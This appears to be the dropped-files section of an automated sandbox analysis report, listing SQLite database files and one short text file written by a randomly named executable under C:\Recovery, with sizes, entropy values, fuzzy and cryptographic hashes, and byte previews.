                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                Category:dropped
                                                                                Size (bytes):28672
                                                                                Entropy (8bit):2.5793180405395284
                                                                                Encrypted:false
                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):49152
                                                                                Entropy (8bit):0.8180424350137764
                                                                                Encrypted:false
                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                Category:dropped
                                                                                Size (bytes):28672
                                                                                Entropy (8bit):2.5793180405395284
                                                                                Encrypted:false
                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):49152
                                                                                Entropy (8bit):0.8180424350137764
                                                                                Encrypted:false
                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5707520969659783
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5707520969659783
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5707520969659783
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):25
                                                                                Entropy (8bit):4.163856189774724
                                                                                Encrypted:false
                                                                                SSDEEP:3:LEtnXd2/:LEN2/
                                                                                MD5:123C67F8556E464FDAA576BE101F80B1
                                                                                SHA1:4B9108F05D0D435D694801706124CE4DD051F7DD
                                                                                SHA-256:E9FA1DBFA15F9CE816D53BAC727F4C42E885AF3C3D73306DFB9908C4E654CE30
                                                                                SHA-512:8CF61EF6364730B6389A978C5581F92349576DAA7E37B32C50BD33D46CA153FF4CC6317E3FA1C985944C2931526D160979F3732654F1D7759C67A94D46C967F3
                                                                                Malicious:false
                                                                                Preview:gcTJMTH9LERXr5lHEOy8Wg9rZ
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                Category:dropped
                                                                                Size (bytes):28672
                                                                                Entropy (8bit):2.5793180405395284
                                                                                Encrypted:false
                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5712781801655107
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):49152
                                                                                Entropy (8bit):0.8180424350137764
                                                                                Encrypted:false
                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
